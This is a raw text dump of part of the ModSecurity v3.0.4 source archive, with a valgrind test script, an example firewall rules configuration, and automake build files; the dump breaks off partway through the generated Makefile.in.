zimmerlezimmerle#!/usr/bin/env bash valgrind --tool=massif valgrind --show-leak-kinds=all --leak-check=full ./test modsecurity-v3.0.4/examples/simple_example_using_c/basic_rules.conf0000644000175000017500000002017213607066010026201 0ustar zimmerlezimmerle# -- Rule engine initialization ---------------------------------------------- # Enable ModSecurity, attaching it to every transaction. Use detection # only to start with, because that minimises the chances of post-installation # disruption. # SecRuleEngine DetectionOnly # -- Request body handling --------------------------------------------------- # Allow ModSecurity to access request bodies. If you don't, ModSecurity # won't be able to see any POST parameters, which opens a large security # hole for attackers to exploit. # SecRequestBodyAccess On # Enable XML request body parser. # Initiate XML Processor in case of xml content-type # SecRule REQUEST_HEADERS:Content-Type "text/xml" \ "id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML" # Enable JSON request body parser. # Initiate JSON Processor in case of JSON content-type; change accordingly # if your application does not use 'application/json' # SecRule REQUEST_HEADERS:Content-Type "application/json" \ "id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON" # Maximum request body size we will accept for buffering. If you support # file uploads then the value given on the first line has to be as large # as the largest file you are willing to accept. The second value refers # to the size of data, with files excluded. You want to keep that value as # low as practical. # # Store up to 128 KB of request body data in memory. When the multipart # parser reachers this limit, it will start using your hard disk for # storage. That is slow, but unavoidable. # # What do do if the request body size is above our configured limit. # Keep in mind that this setting will automatically be set to ProcessPartial # when SecRuleEngine is set to DetectionOnly mode in order to minimize # disruptions when initially deploying ModSecurity. # SecRequestBodyLimitAction Reject # Verify that we've correctly processed the request body. # As a rule of thumb, when failing to process a request body # you should reject the request (when deployed in blocking mode) # or log a high-severity alert (when deployed in detection-only mode). # SecRule REQBODY_ERROR "!@eq 0" \ "id:'200002', phase:2,t:none,log,deny,status:400,msg:'Failed to parse request body.',logdata:'%{reqbody_error_msg}',severity:2" # By default be strict with what we accept in the multipart/form-data # request body. If the rule below proves to be too strict for your # environment consider changing it to detection-only. You are encouraged # _not_ to remove it altogether. # SecRule MULTIPART_STRICT_ERROR "!@eq 0" \ "id:'200003',phase:2,t:none,log,deny,status:400, \ msg:'Multipart request body failed strict validation: \ PE %{REQBODY_PROCESSOR_ERROR}, \ BQ %{MULTIPART_BOUNDARY_QUOTED}, \ BW %{MULTIPART_BOUNDARY_WHITESPACE}, \ DB %{MULTIPART_DATA_BEFORE}, \ DA %{MULTIPART_DATA_AFTER}, \ HF %{MULTIPART_HEADER_FOLDING}, \ LF %{MULTIPART_LF_LINE}, \ SM %{MULTIPART_MISSING_SEMICOLON}, \ IQ %{MULTIPART_INVALID_QUOTING}, \ IP %{MULTIPART_INVALID_PART}, \ IH %{MULTIPART_INVALID_HEADER_FOLDING}, \ FL %{MULTIPART_FILE_LIMIT_EXCEEDED}'" # Did we see anything that might be a boundary? # SecRule MULTIPART_UNMATCHED_BOUNDARY "!@eq 0" \ "id:'200004',phase:2,t:none,log,deny,msg:'Multipart parser detected a possible unmatched boundary.'" # PCRE Tuning # We want to avoid a potential RegEx DoS condition # SecPcreMatchLimit 1000 SecPcreMatchLimitRecursion 1000 # Some internal errors will set flags in TX and we will need to look for these. # All of these are prefixed with "MSC_". The following flags currently exist: # # MSC_PCRE_LIMITS_EXCEEDED: PCRE match limits were exceeded. # SecRule TX:/^MSC_/ "!@streq 0" \ "id:'200005',phase:2,t:none,deny,msg:'ModSecurity internal error flagged: %{MATCHED_VAR_NAME}'" # -- Response body handling -------------------------------------------------- # Allow ModSecurity to access response bodies. # You should have this directive enabled in order to identify errors # and data leakage issues. # # Do keep in mind that enabling this directive does increases both # memory consumption and response latency. # SecResponseBodyAccess On # Which response MIME types do you want to inspect? You should adjust the # configuration below to catch documents but avoid static files # (e.g., images and archives). # SecResponseBodyMimeType text/plain text/html text/xml # Buffer response bodies of up to 512 KB in length. SecResponseBodyLimit 524288 # What happens when we encounter a response body larger than the configured # limit? By default, we process what we have and let the rest through. # That's somewhat less secure, but does not break any legitimate pages. # SecResponseBodyLimitAction ProcessPartial # -- Filesystem configuration ------------------------------------------------ # The location where ModSecurity stores temporary files (for example, when # it needs to handle a file upload that is larger than the configured limit). # # This default setting is chosen due to all systems have /tmp available however, # this is less than ideal. It is recommended that you specify a location that's private. # SecTmpDir /tmp/ # The location where ModSecurity will keep its persistent data. This default setting # is chosen due to all systems have /tmp available however, it # too should be updated to a place that other users can't access. # SecDataDir /tmp/ # -- File uploads handling configuration ------------------------------------- # The location where ModSecurity stores intercepted uploaded files. This # location must be private to ModSecurity. You don't want other users on # the server to access the files, do you? # #SecUploadDir /opt/modsecurity/var/upload/ # By default, only keep the files that were determined to be unusual # in some way (by an external inspection script). For this to work you # will also need at least one file inspection rule. # #SecUploadKeepFiles RelevantOnly # Uploaded files are by default created with permissions that do not allow # any other user to access them. You may need to relax that if you want to # interface ModSecurity to an external program (e.g., an anti-virus). # #SecUploadFileMode 0600 # -- Debug log configuration ------------------------------------------------- # The default debug log configuration is to duplicate the error, warning # and notice messages from the error log. # #SecDebugLog /opt/modsecurity/var/log/debug.log #SecDebugLogLevel 3 # -- Audit log configuration ------------------------------------------------- # Log the transactions that are marked by a rule, as well as those that # trigger a server error (determined by a 5xx or 4xx, excluding 404, # level response status codes). # SecAuditEngine RelevantOnly SecAuditLogRelevantStatus "^(?:5|4(?!04))" # Log everything we know about a transaction. SecAuditLogParts ABIJDEFHZ # Use a single file for logging. This is much easier to look at, but # assumes that you will use the audit log only ocassionally. # SecAuditLogType Serial SecAuditLog /var/log/modsec_audit.log # Specify the path for concurrent audit logging. #SecAuditLogStorageDir /opt/modsecurity/var/audit/ # -- Miscellaneous ----------------------------------------------------------- # Use the most commonly used application/x-www-form-urlencoded parameter # separator. There's probably only one application somewhere that uses # something else so don't expect to change this value. # SecArgumentSeparator & # Settle on version 0 (zero) cookies, as that is what most applications # use. Using an incorrect cookie version may open your installation to # evasion attacks (against the rules that examine named cookies). # SecCookieFormat 0 # Specify your Unicode Code Point. # This mapping is used by the t:urlDecodeUni transformation function # to properly map encoded data to your language. Properly setting # these directives helps to reduce false positives and negatives. # SecUnicodeMapFile unicode.mapping 20127 # Improve the quality of ModSecurity by sharing information about your # current ModSecurity version and dependencies versions. # The following information will be shared: ModSecurity version, # Web Server version, APR version, PCRE version, Lua version, Libxml2 # version, Anonymous unique id for host. SecStatusEngine On modsecurity-v3.0.4/examples/simple_example_using_c/Makefile.am0000644000175000017500000000062713607066010025076 0ustar zimmerlezimmerle noinst_PROGRAMS = test test_SOURCES = \ test.c test_LDADD = \ $(GLOBAL_LDADD) \ $(LUA_LDADD) \ $(SSDEEP_LDADD) test_LDFLAGS = \ -L$(top_builddir)/src/.libs/ \ $(GEOIP_LDFLAGS) \ -lmodsecurity \ -lm \ -lstdc++ \ $(LUA_LDFLAGS) \ $(SSDEEP_LDFLAGS) \ $(YAJL_LDFLAGS) test_CFLAGS = \ -I$(top_builddir)/headers \ -I$(top_builddir) \ $(GLOBAL_CFLAGS) MAINTAINERCLEANFILES = \ Makefile.in modsecurity-v3.0.4/examples/reading_logs_with_offset/0000755000175000017500000000000013607066346023374 5ustar zimmerlezimmerlemodsecurity-v3.0.4/examples/reading_logs_with_offset/Makefile.in0000644000175000017500000006043013607066346025444 0ustar zimmerlezimmerle# Makefile.in generated by automake 1.16.1 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2018 Free Software Foundation, Inc. # This Makefile.in is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY, to the extent permitted by law; without # even the implied warranty of MERCHANTABILITY or FITNESS FOR A # PARTICULAR PURPOSE. @SET_MAKE@ VPATH = @srcdir@ am__is_gnu_make = { \ if test -z '$(MAKELEVEL)'; then \ false; \ elif test -n '$(MAKE_HOST)'; then \ true; \ elif test -n '$(MAKE_VERSION)' && test -n '$(CURDIR)'; then \ true; \ else \ false; \ fi; \ } am__make_running_with_option = \ case $${target_option-} in \ ?) ;; \ *) echo "am__make_running_with_option: internal error: invalid" \ "target option '$${target_option-}' specified" >&2; \ exit 1;; \ esac; \ has_opt=no; \ sane_makeflags=$$MAKEFLAGS; \ if $(am__is_gnu_make); then \ sane_makeflags=$$MFLAGS; \ else \ case $$MAKEFLAGS in \ *\\[\ \ ]*) \ bs=\\; \ sane_makeflags=`printf '%s\n' "$$MAKEFLAGS" \ | sed "s/$$bs$$bs[$$bs $$bs ]*//g"`;; \ esac; \ fi; \ skip_next=no; \ strip_trailopt () \ { \ flg=`printf '%s\n' "$$flg" | sed "s/$$1.*$$//"`; \ }; \ for flg in $$sane_makeflags; do \ test $$skip_next = yes && { skip_next=no; continue; }; \ case $$flg in \ *=*|--*) continue;; \ -*I) strip_trailopt 'I'; skip_next=yes;; \ -*I?*) strip_trailopt 'I';; \ -*O) strip_trailopt 'O'; skip_next=yes;; \ -*O?*) strip_trailopt 'O';; \ -*l) strip_trailopt 'l'; skip_next=yes;; \ -*l?*) strip_trailopt 'l';; \ -[dEDm]) skip_next=yes;; \ -[JT]) skip_next=yes;; \ esac; \ case $$flg in \ *$$target_option*) has_opt=yes; break;; \ esac; \ done; \ test $$has_opt = yes am__make_dryrun = (target_option=n; $(am__make_running_with_option)) am__make_keepgoing = (target_option=k; $(am__make_running_with_option)) pkgdatadir = $(datadir)/@PACKAGE@ pkgincludedir = $(includedir)/@PACKAGE@ pkglibdir = $(libdir)/@PACKAGE@ pkglibexecdir = $(libexecdir)/@PACKAGE@ am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd install_sh_DATA = $(install_sh) -c -m 644 install_sh_PROGRAM = $(install_sh) -c install_sh_SCRIPT = $(install_sh) -c INSTALL_HEADER = $(INSTALL_DATA) transform = $(program_transform_name) NORMAL_INSTALL = : PRE_INSTALL = : POST_INSTALL = : NORMAL_UNINSTALL = : PRE_UNINSTALL = : POST_UNINSTALL = : build_triplet = @build@ host_triplet = @host@ noinst_PROGRAMS = read$(EXEEXT) subdir = examples/reading_logs_with_offset ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 am__aclocal_m4_deps = $(top_srcdir)/build/ax_prog_doxygen.m4 \ $(top_srcdir)/build/ax_valgrind_check.m4 \ $(top_srcdir)/build/curl.m4 $(top_srcdir)/build/libgeoip.m4 \ $(top_srcdir)/build/libmaxmind.m4 \ $(top_srcdir)/build/libtool.m4 $(top_srcdir)/build/libxml.m4 \ $(top_srcdir)/build/lmdb.m4 $(top_srcdir)/build/ltoptions.m4 \ $(top_srcdir)/build/ltsugar.m4 \ $(top_srcdir)/build/ltversion.m4 \ $(top_srcdir)/build/lt~obsolete.m4 $(top_srcdir)/build/lua.m4 \ $(top_srcdir)/build/pcre.m4 $(top_srcdir)/build/ssdeep.m4 \ $(top_srcdir)/build/yajl.m4 $(top_srcdir)/configure.ac am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \ $(ACLOCAL_M4) DIST_COMMON = $(srcdir)/Makefile.am $(am__DIST_COMMON) mkinstalldirs = $(install_sh) -d CONFIG_HEADER = $(top_builddir)/src/config.h CONFIG_CLEAN_FILES = CONFIG_CLEAN_VPATH_FILES = PROGRAMS = $(noinst_PROGRAMS) am_read_OBJECTS = read-read.$(OBJEXT) read_OBJECTS = $(am_read_OBJECTS) am__DEPENDENCIES_1 = read_DEPENDENCIES = $(top_builddir)/src/.libs/libmodsecurity.a \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) AM_V_lt = $(am__v_lt_@AM_V@) am__v_lt_ = $(am__v_lt_@AM_DEFAULT_V@) am__v_lt_0 = --silent am__v_lt_1 = read_LINK = $(LIBTOOL) $(AM_V_lt) --tag=CXX $(AM_LIBTOOLFLAGS) \ $(LIBTOOLFLAGS) --mode=link $(CXXLD) $(AM_CXXFLAGS) \ $(CXXFLAGS) $(read_LDFLAGS) $(LDFLAGS) -o $@ AM_V_P = $(am__v_P_@AM_V@) am__v_P_ = $(am__v_P_@AM_DEFAULT_V@) am__v_P_0 = false am__v_P_1 = : AM_V_GEN = $(am__v_GEN_@AM_V@) am__v_GEN_ = $(am__v_GEN_@AM_DEFAULT_V@) am__v_GEN_0 = @echo " GEN " $@; am__v_GEN_1 = AM_V_at = $(am__v_at_@AM_V@) am__v_at_ = $(am__v_at_@AM_DEFAULT_V@) am__v_at_0 = @ am__v_at_1 = DEFAULT_INCLUDES = -I.@am__isrc@ -I$(top_builddir)/src depcomp = $(SHELL) $(top_srcdir)/depcomp am__maybe_remake_depfiles = depfiles am__depfiles_remade = ./$(DEPDIR)/read-read.Po am__mv = mv -f CXXCOMPILE = $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) \ $(AM_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) LTCXXCOMPILE = $(LIBTOOL) $(AM_V_lt) --tag=CXX $(AM_LIBTOOLFLAGS) \ $(LIBTOOLFLAGS) --mode=compile $(CXX) $(DEFS) \ $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) \ $(AM_CXXFLAGS) $(CXXFLAGS) AM_V_CXX = $(am__v_CXX_@AM_V@) am__v_CXX_ = $(am__v_CXX_@AM_DEFAULT_V@) am__v_CXX_0 = @echo " CXX " $@; am__v_CXX_1 = CXXLD = $(CXX) CXXLINK = $(LIBTOOL) $(AM_V_lt) --tag=CXX $(AM_LIBTOOLFLAGS) \ $(LIBTOOLFLAGS) --mode=link $(CXXLD) $(AM_CXXFLAGS) \ $(CXXFLAGS) $(AM_LDFLAGS) $(LDFLAGS) -o $@ AM_V_CXXLD = $(am__v_CXXLD_@AM_V@) am__v_CXXLD_ = $(am__v_CXXLD_@AM_DEFAULT_V@) am__v_CXXLD_0 = @echo " CXXLD " $@; am__v_CXXLD_1 = SOURCES = $(read_SOURCES) DIST_SOURCES = $(read_SOURCES) am__can_run_installinfo = \ case $$AM_UPDATE_INFO_DIR in \ n|no|NO) false;; \ *) (install-info --version) >/dev/null 2>&1;; \ esac am__tagged_files = $(HEADERS) $(SOURCES) $(TAGS_FILES) $(LISP) # Read a list of newline-separated strings from the standard input, # and print each of them once, without duplicates. Input order is # *not* preserved. am__uniquify_input = $(AWK) '\ BEGIN { nonempty = 0; } \ { items[$$0] = 1; nonempty = 1; } \ END { if (nonempty) { for (i in items) print i; }; } \ ' # Make sure the list of sources is unique. This is necessary because, # e.g., the same source file might be shared among _SOURCES variables # for different programs/libraries. am__define_uniq_tagged_files = \ list='$(am__tagged_files)'; \ unique=`for i in $$list; do \ if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \ done | $(am__uniquify_input)` ETAGS = etags CTAGS = ctags am__DIST_COMMON = $(srcdir)/Makefile.in $(top_srcdir)/depcomp DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST) ACLOCAL = @ACLOCAL@ AMTAR = @AMTAR@ AM_DEFAULT_VERBOSITY = @AM_DEFAULT_VERBOSITY@ AR = @AR@ AUTOCONF = @AUTOCONF@ AUTOHEADER = @AUTOHEADER@ AUTOMAKE = @AUTOMAKE@ AWK = @AWK@ BISON = @BISON@ CC = @CC@ CCDEPMODE = @CCDEPMODE@ CFLAGS = @CFLAGS@ CPP = @CPP@ CPPFLAGS = @CPPFLAGS@ CURL_CFLAGS = @CURL_CFLAGS@ CURL_CONFIG = @CURL_CONFIG@ CURL_CPPFLAGS = @CURL_CPPFLAGS@ CURL_DISPLAY = @CURL_DISPLAY@ CURL_FOUND = @CURL_FOUND@ CURL_LDADD = @CURL_LDADD@ CURL_LDFLAGS = @CURL_LDFLAGS@ CURL_USES_GNUTLS = @CURL_USES_GNUTLS@ CURL_VERSION = @CURL_VERSION@ CXX = @CXX@ CXXCPP = @CXXCPP@ CXXDEPMODE = @CXXDEPMODE@ CXXFLAGS = @CXXFLAGS@ CYGPATH_W = @CYGPATH_W@ DEFS = @DEFS@ DEPDIR = @DEPDIR@ DLLTOOL = @DLLTOOL@ DOXYGEN_PAPER_SIZE = @DOXYGEN_PAPER_SIZE@ DSYMUTIL = @DSYMUTIL@ DUMPBIN = @DUMPBIN@ DX_CONFIG = @DX_CONFIG@ DX_DOCDIR = @DX_DOCDIR@ DX_DOT = @DX_DOT@ DX_DOXYGEN = @DX_DOXYGEN@ DX_DVIPS = @DX_DVIPS@ DX_EGREP = @DX_EGREP@ DX_ENV = @DX_ENV@ DX_FLAG_chi = @DX_FLAG_chi@ DX_FLAG_chm = @DX_FLAG_chm@ DX_FLAG_doc = @DX_FLAG_doc@ DX_FLAG_dot = @DX_FLAG_dot@ DX_FLAG_html = @DX_FLAG_html@ DX_FLAG_man = @DX_FLAG_man@ DX_FLAG_pdf = @DX_FLAG_pdf@ DX_FLAG_ps = @DX_FLAG_ps@ DX_FLAG_rtf = @DX_FLAG_rtf@ DX_FLAG_xml = @DX_FLAG_xml@ DX_HHC = @DX_HHC@ DX_LATEX = @DX_LATEX@ DX_MAKEINDEX = @DX_MAKEINDEX@ DX_PDFLATEX = @DX_PDFLATEX@ DX_PERL = @DX_PERL@ DX_PROJECT = @DX_PROJECT@ ECHO_C = @ECHO_C@ ECHO_N = @ECHO_N@ ECHO_T = @ECHO_T@ EGREP = @EGREP@ ENABLE_VALGRIND_drd = @ENABLE_VALGRIND_drd@ ENABLE_VALGRIND_helgrind = @ENABLE_VALGRIND_helgrind@ ENABLE_VALGRIND_memcheck = @ENABLE_VALGRIND_memcheck@ ENABLE_VALGRIND_sgcheck = @ENABLE_VALGRIND_sgcheck@ EXEEXT = @EXEEXT@ FGREP = @FGREP@ FLEX = @FLEX@ GEOIP_CFLAGS = @GEOIP_CFLAGS@ GEOIP_DISPLAY = @GEOIP_DISPLAY@ GEOIP_FOUND = @GEOIP_FOUND@ GEOIP_LDADD = @GEOIP_LDADD@ GEOIP_LDFLAGS = @GEOIP_LDFLAGS@ GEOIP_LIBS = @GEOIP_LIBS@ GEOIP_VERSION = @GEOIP_VERSION@ GLOBAL_CFLAGS = @GLOBAL_CFLAGS@ GLOBAL_CPPFLAGS = @GLOBAL_CPPFLAGS@ GLOBAL_LDADD = @GLOBAL_LDADD@ GREP = @GREP@ INSTALL = @INSTALL@ INSTALL_DATA = @INSTALL_DATA@ INSTALL_PROGRAM = @INSTALL_PROGRAM@ INSTALL_SCRIPT = @INSTALL_SCRIPT@ INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@ LD = @LD@ LDFLAGS = @LDFLAGS@ LEX = @LEX@ LEXLIB = @LEXLIB@ LEX_OUTPUT_ROOT = @LEX_OUTPUT_ROOT@ LIBOBJS = @LIBOBJS@ LIBS = @LIBS@ LIBTOOL = @LIBTOOL@ LIBXML2_CFLAGS = @LIBXML2_CFLAGS@ LIBXML2_CONFIG = @LIBXML2_CONFIG@ LIBXML2_CPPFLAGS = @LIBXML2_CPPFLAGS@ LIBXML2_DISPLAY = @LIBXML2_DISPLAY@ LIBXML2_FOUND = @LIBXML2_FOUND@ LIBXML2_LDADD = @LIBXML2_LDADD@ LIBXML2_LDFLAGS = @LIBXML2_LDFLAGS@ LIBXML2_VERSION = @LIBXML2_VERSION@ LIPO = @LIPO@ LMDB_CFLAGS = @LMDB_CFLAGS@ LMDB_DISPLAY = @LMDB_DISPLAY@ LMDB_FOUND = @LMDB_FOUND@ LMDB_LDADD = @LMDB_LDADD@ LMDB_LDFLAGS = @LMDB_LDFLAGS@ LMDB_LIBS = @LMDB_LIBS@ LMDB_VERSION = @LMDB_VERSION@ LN_S = @LN_S@ LTLIBOBJS = @LTLIBOBJS@ LT_SYS_LIBRARY_PATH = @LT_SYS_LIBRARY_PATH@ LUA_CFLAGS = @LUA_CFLAGS@ LUA_DISPLAY = @LUA_DISPLAY@ LUA_FOUND = @LUA_FOUND@ LUA_LDADD = @LUA_LDADD@ LUA_LDFLAGS = @LUA_LDFLAGS@ MAKEINFO = @MAKEINFO@ MANIFEST_TOOL = @MANIFEST_TOOL@ MAXMIND_CFLAGS = @MAXMIND_CFLAGS@ MAXMIND_DISPLAY = @MAXMIND_DISPLAY@ MAXMIND_FOUND = @MAXMIND_FOUND@ MAXMIND_LDADD = @MAXMIND_LDADD@ MAXMIND_LDFLAGS = @MAXMIND_LDFLAGS@ MAXMIND_LIBS = @MAXMIND_LIBS@ MAXMIND_VERSION = @MAXMIND_VERSION@ MKDIR_P = @MKDIR_P@ MODSEC_MUTEX_ON_PM = @MODSEC_MUTEX_ON_PM@ MODSEC_NO_LOGS = @MODSEC_NO_LOGS@ MSC_BASE_DIR = @MSC_BASE_DIR@ MSC_GIT_VERSION = @MSC_GIT_VERSION@ MSC_VERSION = @MSC_VERSION@ MSC_VERSION_INFO = @MSC_VERSION_INFO@ MSC_VERSION_WITH_PATCHLEVEL = @MSC_VERSION_WITH_PATCHLEVEL@ NM = @NM@ NMEDIT = @NMEDIT@ OBJDUMP = @OBJDUMP@ OBJEXT = @OBJEXT@ OTOOL = @OTOOL@ OTOOL64 = @OTOOL64@ PACKAGE = @PACKAGE@ PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@ PACKAGE_NAME = @PACKAGE_NAME@ PACKAGE_STRING = @PACKAGE_STRING@ PACKAGE_TARNAME = @PACKAGE_TARNAME@ PACKAGE_URL = @PACKAGE_URL@ PACKAGE_VERSION = @PACKAGE_VERSION@ PATH_SEPARATOR = @PATH_SEPARATOR@ PCRE_CFLAGS = @PCRE_CFLAGS@ PCRE_CONFIG = @PCRE_CONFIG@ PCRE_CPPFLAGS = @PCRE_CPPFLAGS@ PCRE_LDADD = @PCRE_LDADD@ PCRE_LDFLAGS = @PCRE_LDFLAGS@ PCRE_LD_PATH = @PCRE_LD_PATH@ PCRE_VERSION = @PCRE_VERSION@ PKG_CONFIG = @PKG_CONFIG@ PKG_CONFIG_LIBDIR = @PKG_CONFIG_LIBDIR@ PKG_CONFIG_PATH = @PKG_CONFIG_PATH@ RANLIB = @RANLIB@ SED = @SED@ SET_MAKE = @SET_MAKE@ SHELL = @SHELL@ SSDEEP_CFLAGS = @SSDEEP_CFLAGS@ SSDEEP_DISPLAY = @SSDEEP_DISPLAY@ SSDEEP_FOUND = @SSDEEP_FOUND@ SSDEEP_LDADD = @SSDEEP_LDADD@ SSDEEP_LDFLAGS = @SSDEEP_LDFLAGS@ STRIP = @STRIP@ VALGRIND = @VALGRIND@ VALGRIND_ENABLED = @VALGRIND_ENABLED@ VERSION = @VERSION@ YACC = @YACC@ YACC_INST = @YACC_INST@ YAJL_CFLAGS = @YAJL_CFLAGS@ YAJL_DISPLAY = @YAJL_DISPLAY@ YAJL_FOUND = @YAJL_FOUND@ YAJL_LDADD = @YAJL_LDADD@ YAJL_LDFLAGS = @YAJL_LDFLAGS@ YAJL_LIBS = @YAJL_LIBS@ YAJL_VERSION = @YAJL_VERSION@ YFLAGS = @YFLAGS@ abs_builddir = @abs_builddir@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ abs_top_srcdir = @abs_top_srcdir@ ac_ct_AR = @ac_ct_AR@ ac_ct_CC = @ac_ct_CC@ ac_ct_CXX = @ac_ct_CXX@ ac_ct_DUMPBIN = @ac_ct_DUMPBIN@ am__include = @am__include@ am__leading_dot = @am__leading_dot@ am__quote = @am__quote@ am__tar = @am__tar@ am__untar = @am__untar@ bindir = @bindir@ build = @build@ build_alias = @build_alias@ build_cpu = @build_cpu@ build_os = @build_os@ build_vendor = @build_vendor@ builddir = @builddir@ datadir = @datadir@ datarootdir = @datarootdir@ docdir = @docdir@ dvidir = @dvidir@ exec_prefix = @exec_prefix@ host = @host@ host_alias = @host_alias@ host_cpu = @host_cpu@ host_os = @host_os@ host_vendor = @host_vendor@ htmldir = @htmldir@ includedir = @includedir@ infodir = @infodir@ install_sh = @install_sh@ libdir = @libdir@ libexecdir = @libexecdir@ localedir = @localedir@ localstatedir = @localstatedir@ mandir = @mandir@ mkdir_p = @mkdir_p@ oldincludedir = @oldincludedir@ pdfdir = @pdfdir@ prefix = @prefix@ program_transform_name = @program_transform_name@ psdir = @psdir@ sbindir = @sbindir@ sharedstatedir = @sharedstatedir@ srcdir = @srcdir@ sysconfdir = @sysconfdir@ target_alias = @target_alias@ top_build_prefix = @top_build_prefix@ top_builddir = @top_builddir@ top_srcdir = @top_srcdir@ valgrind_enabled_tools = @valgrind_enabled_tools@ valgrind_tools = @valgrind_tools@ read_SOURCES = \ read.cc read_LDADD = \ $(top_builddir)/src/.libs/libmodsecurity.a \ $(CURL_LDADD) \ $(GEOIP_LDADD) \ $(MAXMIND_LDADD) \ $(GLOBAL_LDADD) \ $(LIBXML2_LDADD) \ $(LMDB_LDADD) \ $(LUA_LDADD) \ $(PCRE_LDADD) \ $(SSDEEP_LDADD) \ $(YAJL_LDADD) read_LDFLAGS = \ $(GEOIP_LDFLAGS) \ $(LMDB_LDFLAGS) \ $(LUA_LDFLAGS) \ $(SSDEEP_LDFLAGS) \ $(MAXMIND_LDFLAGS) \ $(YAJL_LDFLAGS) read_CPPFLAGS = \ $(GLOBAL_CFLAGS) \ -std=c++11 \ -I$(top_builddir)/headers \ -I$(top_builddir) \ -g \ -I../others \ -fPIC \ -O3 \ $(GEOIP_CFLAGS) \ $(MAXMIND_CFLAGS) \ $(GLOBAL_CPPFLAGS) \ $(MODSEC_NO_LOGS) \ $(YAJL_CFLAGS) \ $(LMDB_CFLAGS) \ $(LUA_CFLAGS) \ $(PCRE_CFLAGS) \ $(LIBXML2_CFLAGS) MAINTAINERCLEANFILES = \ Makefile.in all: all-am .SUFFIXES: .SUFFIXES: .cc .lo .o .obj $(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps) @for dep in $?; do \ case '$(am__configure_deps)' in \ *$$dep*) \ ( cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh ) \ && { if test -f $@; then exit 0; else break; fi; }; \ exit 1;; \ esac; \ done; \ echo ' cd $(top_srcdir) && $(AUTOMAKE) --foreign examples/reading_logs_with_offset/Makefile'; \ $(am__cd) $(top_srcdir) && \ $(AUTOMAKE) --foreign examples/reading_logs_with_offset/Makefile Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status @case '$?' in \ *config.status*) \ cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh;; \ *) \ echo ' cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles)'; \ cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles);; \ esac; $(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(top_srcdir)/configure: $(am__configure_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(ACLOCAL_M4): $(am__aclocal_m4_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(am__aclocal_m4_deps): clean-noinstPROGRAMS: @list='$(noinst_PROGRAMS)'; test -n "$$list" || exit 0; \ echo " rm -f" $$list; \ rm -f $$list || exit $$?; \ test -n "$(EXEEXT)" || exit 0; \ list=`for p in $$list; do echo "$$p"; done | sed 's/$(EXEEXT)$$//'`; \ echo " rm -f" $$list; \ rm -f $$list read$(EXEEXT): $(read_OBJECTS) $(read_DEPENDENCIES) $(EXTRA_read_DEPENDENCIES) @rm -f read$(EXEEXT) $(AM_V_CXXLD)$(read_LINK) $(read_OBJECTS) $(read_LDADD) $(LIBS) mostlyclean-compile: -rm -f *.$(OBJEXT) distclean-compile: -rm -f *.tab.c @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/read-read.Po@am__quote@ # am--include-marker $(am__depfiles_remade): @$(MKDIR_P) $(@D) @echo '# dummy' >$@-t && $(am__mv) $@-t $@ am--depfiles: $(am__depfiles_remade) .cc.o: @am__fastdepCXX_TRUE@ $(AM_V_CXX)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.o$$||'`;\ @am__fastdepCXX_TRUE@ $(CXXCOMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ $< &&\ @am__fastdepCXX_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='$<' object='$@' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXXCOMPILE) -c -o $@ $< .cc.obj: @am__fastdepCXX_TRUE@ $(AM_V_CXX)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.obj$$||'`;\ @am__fastdepCXX_TRUE@ $(CXXCOMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ `$(CYGPATH_W) '$<'` &&\ @am__fastdepCXX_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='$<' object='$@' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) 